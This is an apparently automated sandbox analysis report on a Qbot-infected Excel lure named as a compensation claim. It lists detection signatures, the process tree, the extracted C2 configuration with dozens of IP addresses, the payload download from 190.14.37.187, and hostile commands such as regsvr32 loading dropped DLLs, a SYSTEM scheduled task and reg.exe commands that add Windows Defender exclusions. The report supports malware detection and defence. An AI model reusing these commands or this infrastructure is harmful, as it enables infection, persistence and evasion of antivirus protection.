Windows Analysis Report CompensationClaim-1630636598-09282021.xls

Overview

General Information

Sample Name: CompensationClaim-1630636598-09282021.xls
Analysis ID: 492661
MD5: f3e5e9eb94f7bc0115c4b373093d085d
SHA1: 2142f513fa165dbc4fe13d5aa1ccc10f029f31c5
SHA256: a57b036af033da6944bb62320662310585d2f23b1d275cd7f01f9c786608e551
Tags: xls

Detection

Hidden Macro 4.0 Qbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Qbot
Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Regsvr32 Command Line Without DLL
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3032 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2592 cmdline: regsvr32 -silent ..\Drezd.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2540 cmdline: -silent ..\Drezd.red MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 448 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • schtasks.exe (PID: 1840 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn rzbsnuprv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:17 /ET 22:29 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • regsvr32.exe (PID: 2032 cmdline: regsvr32 -silent ..\Drezd1.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2416 cmdline: regsvr32 -silent ..\Drezd2.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • regsvr32.exe (PID: 1584 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2912 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)
      • explorer.exe (PID: 3068 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
        • reg.exe (PID: 3024 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Qukpmcii' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
        • reg.exe (PID: 1136 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Xicyyyqnqeyf' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
  • regsvr32.exe (PID: 1636 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2044 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

Threatname: Qbot

{"Bot id": "obama105", "Campaign": "1632819007", "Version": "402.343", "C2 list": ["120.150.218.241:995", "95.77.223.148:443", "185.250.148.74:443", "181.118.183.94:443", "105.198.236.99:443", "140.82.49.12:443", "37.210.152.224:995", "89.101.97.139:443", "81.241.252.59:2078", "27.223.92.142:995", "81.250.153.227:2222", "73.151.236.31:443", "47.22.148.6:443", "122.11.220.212:2222", "120.151.47.189:443", "199.27.127.129:443", "216.201.162.158:443", "136.232.34.70:443", "76.25.142.196:443", "75.66.88.33:443", "45.46.53.140:2222", "173.25.166.81:443", "103.148.120.144:443", "173.21.10.71:2222", "186.18.205.199:995", "71.74.12.34:443", "67.165.206.193:993", "47.40.196.233:2222", "68.204.7.158:443", "47.40.196.233:2222", "24.229.150.54:995", "109.12.111.14:443", "177.130.82.197:2222", "72.252.201.69:443", "24.55.112.61:443", "24.139.72.117:443", "187.156.138.172:443", "71.80.168.245:443", "196.217.156.63:995", "82.77.137.101:995", "173.234.155.233:443", "75.188.35.168:443", "5.238.149.235:61202", "73.77.87.137:443", "182.176.112.182:443", "96.37.113.36:993", "162.244.227.34:443", "92.59.35.196:2222", "196.218.227.241:995", "68.207.102.78:443", "2.188.27.77:443", "189.210.115.207:443", "181.163.96.53:443", "75.107.26.196:465", "185.250.148.74:2222", "68.186.192.69:443"]}

Yara Overview

Initial Sample

Source: CompensationClaim-1630636598-09282021.xls, Rule: JoeSecurity_HiddenMacro, Description: Yara detected hidden Macro 4.0 in Excel, Author: Joe Security

Memory Dumps

Source: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Author: Joe Security
Source: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Author: Joe Security
Source: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Author: Joe Security
Source: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Author: Joe Security
Source: 0000000D.00000002.631006029.00000000001D0000.00000004.00000001.sdmp, Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Author: Joe Security

Unpacked PEs

Source: 13.2.regsvr32.exe.1d0000.0.unpack, Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Author: Joe Security
Source: 7.2.explorer.exe.c0000.0.raw.unpack, Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Author: Joe Security
Source: 6.2.regsvr32.exe.1e0000.0.raw.unpack, Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Author: Joe Security
Source: 7.2.explorer.exe.c0000.0.unpack, Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Author: Joe Security
Source: 13.2.regsvr32.exe.10000000.8.unpack, Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started, Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\Drezd.red, CommandLine: regsvr32 -silent ..\Drezd.red, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3032, ProcessCommandLine: regsvr32 -silent ..\Drezd.red, ProcessId: 2592
Sigma detected: Regsvr32 Command Line Without DLL
Source: Process started, Author: Florian Roth: Data: Command: -silent ..\Drezd.red, CommandLine: -silent ..\Drezd.red, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -silent ..\Drezd.red, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2592, ProcessCommandLine: -silent ..\Drezd.red, ProcessId: 2540

Persistence and Installation Behavior:

Sigma detected: Schedule system process
Source: Process started, Author: Joe Security: Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn rzbsnuprv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:17 /ET 22:29, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn rzbsnuprv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:17 /ET 22:29, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 448, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn rzbsnuprv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:17 /ET 22:29, ProcessId: 1840

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 6.2.regsvr32.exe.1e0000.0.raw.unpack, Malware Configuration Extractor: Qbot (configuration identical to the one listed under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.926671412[1].dat, ReversingLabs: Detection: 15%
Source: 6.2.regsvr32.exe.2710000.7.unpack, Avira: Label: TR/Crypt.XPACK.Gen2
Source: 13.2.regsvr32.exe.1510000.7.unpack, Avira: Label: TR/Crypt.XPACK.Gen2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: amstream.pdb source: explorer.exe, 00000007.00000003.619382227.0000000002780000.00000004.00000040.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 6_2_1000AEB4 FindFirstFileW,FindNextFileW
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 7_2_000CAEB4 FindFirstFileW,FindNextFileW
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_1000AEB4 FindFirstFileW,FindNextFileW
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 14_2_0008AEB4 FindFirstFileW,FindNextFileW

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: 44467.926671412[1].dat.0.dr
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Source: global traffic, TCP traffic: 192.168.2.22:49167 -> 190.14.37.187:80
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 28 Sep 2021 20:14:50 GMT
  Content-Type: application/octet-stream
  Content-Length: 259072
  Connection: keep-alive
  X-Powered-By: PHP/5.4.16
  Accept-Ranges: bytes
  Expires: 0
  Cache-Control: no-cache, no-store, must-revalidate
  Content-Disposition: attachment; filename="44467.926671412.dat"
Source: global traffic, HTTP traffic detected:
  GET /44467.926671412.dat HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 190.14.37.187
  Connection: Keep-Alive
Source: unknown, TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: regsvr32.exe, 00000006.00000002.616692912.00000000020E0000.00000002.00020000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000005.00000002.619981269.0000000001C90000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.616276328.0000000001DE0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.620593142.0000000001CE0000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.621391071.0000000001C40000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.633974439.0000000000970000.00000002.00020000.sdmp, String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000006.00000002.616692912.00000000020E0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.881939093.0000000001FD0000.00000002.00020000.sdmp, String found in binary or memory: http://www.%s.comPA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.926671412[1].dat

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4, Screenshot OCR: Enable editing" 20 from the yellow bar above. 21 example of notification 22 23 ( 0 PROTECTH)WARN
Source: Screenshot number: 4, Screenshot OCR: Enable Content" to perform Miscrosoft Excel Decryption Core to start the 27 decryption of the docum
Source: Screenshot number: 4, Screenshot OCR: Enable Macros ) 32 33 :: Why I can not open th"s document? 36 37 - You are using iOS or Android
Source: Document image extraction number: 0, Screenshot OCR: Enable editing" from the yellow bar above. example of notification ( 0 ~ECTHWARNING This file ori
Source: Document image extraction number: 0, Screenshot OCR: Enable Content" to perform Miscrosoft Excel Decryption Core to start the decryption of the document
Source: Document image extraction number: 0, Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Source: Document image extraction number: 1, Screenshot OCR: Enable editing" from the yellow bar above. example of notification ( 0 PROTECTH)WARNNG Thisfileor
Source: Document image extraction number: 1, Screenshot OCR: Enable Content" to perform Miscrosoft Excel Decryption Core to start the decryption of the document
Source: Document image extraction number: 1, Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\Drezd.red
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.926671412[1].dat
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 6_2_10016EB0
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 6_2_10012346
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 6_2_10011758
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 6_2_10014FC0
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 7_2_000D6EB0
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 7_2_000D2346
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 7_2_000D1758
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 7_2_000D4FC0
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_10016EB0
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_10012346
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_10011758
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_10014FC0
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 14_2_00096EB0
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 14_2_00092346
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 14_2_00091758
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 14_2_00094FC0
Source: CompensationClaim-1630636598-09282021.xls, OLE, VBA macro line: Sub auto_open()
Source: CompensationClaim-1630636598-09282021.xls, OLE, VBA macro line: Sub auto_close()
Source: CompensationClaim-1630636598-09282021.xls, OLE, VBA macro line: Private m_openAlreadyRan As Boolean
Source: CompensationClaim-1630636598-09282021.xls, OLE, VBA macro line: Private Sub saWorkbook_Opensa()
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 6_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 6_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary
Source: Drezd.red.14.dr, Static PE information: No import functions for PE file found
Source: Drezd.red.7.dr, Static PE information: No import functions for PE file found
Source: C:\Windows\SysWOW64\explorer.exe, Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Qukpmcii' /d '0'
Source: CompensationClaim-1630636598-09282021.xls, OLE indicator, VBA macros: true
Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.926671412[1].dat 405E8907B3775351B266445FAE051055A10D97FB89ED926B5FA083F32028F5D4
Source: Joe Sandbox View, Dropped File: C:\Users\user\Drezd.red 2382A58FAE508FA15BD5D02A39504B9C2898E8737BA417CB6EE54BD2A8804989
Source: C:\Windows\SysWOW64\regsvr32.exe, Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe, Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe, Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe, Memory allocated: 76E90000 page execute and read and write
                        Source: C:\Windows\System32\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: C:\Windows\System32\reg.exe Console Write: The operation completed successfully.
                        Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
                        Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
                        Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
                        Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn rzbsnuprv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:17 /ET 22:29
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
                        Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Qukpmcii' /d '0'
                        Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Xicyyyqnqeyf' /d '0'
                        Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Application Data\Microsoft\Forms
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVREBE4.tmp
                        Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@25/6@0/3
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket, 6_2_1000D523
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_100030B7 StartServiceCtrlDispatcherA, 13_2_100030B7
                        Source: CompensationClaim-1630636598-09282021.xls OLE indicator, Workbook stream: true
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle, 6_2_1000ABA3
                        Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\Global\{F7283DB5-08D2-499C-8239-7A22FAD70FB5}
                        Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{0F3B3E8B-D02A-4319-A2CB-E59F48A33254}
                        Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{B10879F0-7D9D-4B34-A7DD-5DF6660C35C8}
                        Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{B10879F0-7D9D-4B34-A7DD-5DF6660C35C8}
                        Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{0F3B3E8B-D02A-4319-A2CB-E59F48A33254}
                        Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{F7283DB5-08D2-499C-8239-7A22FAD70FB5}
                        Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Window found: window name: SysTabControl32
                        Source: Window Recorder Window detected: More than 3 window changes detected
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                        Source: Binary string: amstream.pdb source: explorer.exe, 00000007.00000003.619382227.0000000002780000.00000004.00000040.sdmp
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_02711000 push eax; mov dword ptr [esp], 000FFFFFh 6_2_027112EE
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_0271455B push edx; mov dword ptr [esp], 00000003h 6_2_027145A5
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_0271455B push edx; mov dword ptr [esp], 00F00000h 6_2_027145AE
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1001A00E push ebx; ret 6_2_1001A00F
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1001D485 push FFFFFF8Ah; iretd 6_2_1001D50E
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1001D4B6 push FFFFFF8Ah; iretd 6_2_1001D50E
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_10019D5C push cs; iretd 6_2_10019E32
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_10019E5E push cs; iretd 6_2_10019E32
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1001BB29 push esi; iretd 6_2_1001BB2E
                        Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_000DA00E push ebx; ret 7_2_000DA00F
                        Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_000DD485 push FFFFFF8Ah; iretd 7_2_000DD50E
                        Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_000DD4B6 push FFFFFF8Ah; iretd 7_2_000DD50E
                        Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_000D9D5C push cs; iretd 7_2_000D9E32
                        Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_000D9E5E push cs; iretd 7_2_000D9E32
                        Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_000DBB29 push esi; iretd 7_2_000DBB2E
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_01511000 push eax; mov dword ptr [esp], 000FFFFFh 13_2_015112EE
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_0151455B push edx; mov dword ptr [esp], 00000003h 13_2_015145A5
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_0151455B push edx; mov dword ptr [esp], 00F00000h 13_2_015145AE
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_1001A00E push ebx; ret 13_2_1001A00F
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_1001D485 push FFFFFF8Ah; iretd 13_2_1001D50E
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_1001D4B6 push FFFFFF8Ah; iretd 13_2_1001D50E
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_10019D5C push cs; iretd 13_2_10019E32
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_10019E5E push cs; iretd 13_2_10019E32
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_1001BB29 push esi; iretd 13_2_1001BB2E
                        Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0009A00E push ebx; ret 14_2_0009A00F
                        Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0009D485 push FFFFFF8Ah; iretd 14_2_0009D50E
                        Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0009D4B6 push FFFFFF8Ah; iretd 14_2_0009D50E
                        Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_00099D5C push cs; iretd 14_2_00099E32
                        Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_00099E5E push cs; iretd 14_2_00099E32
                        Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0009BB29 push esi; iretd 14_2_0009BB2E
                        Source: 44467.926671412[1].dat.0.dr Static PE information: section name: .rdatat
                        Source: Drezd.red.0.dr Static PE information: section name: .rdatat
                        Source: Drezd.red.7.dr Static PE information: section name: .rdatat
                        Source: Drezd.red.14.dr Static PE information: section name: .rdatat
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1000DFAD LoadLibraryA,GetProcAddress, 6_2_1000DFAD

                        Persistence and Installation Behavior:

                        Uses cmd line tools excessively to alter registry or file data
                        Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd.red
                        Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.926671412[1].dat

                        Boot Survival:

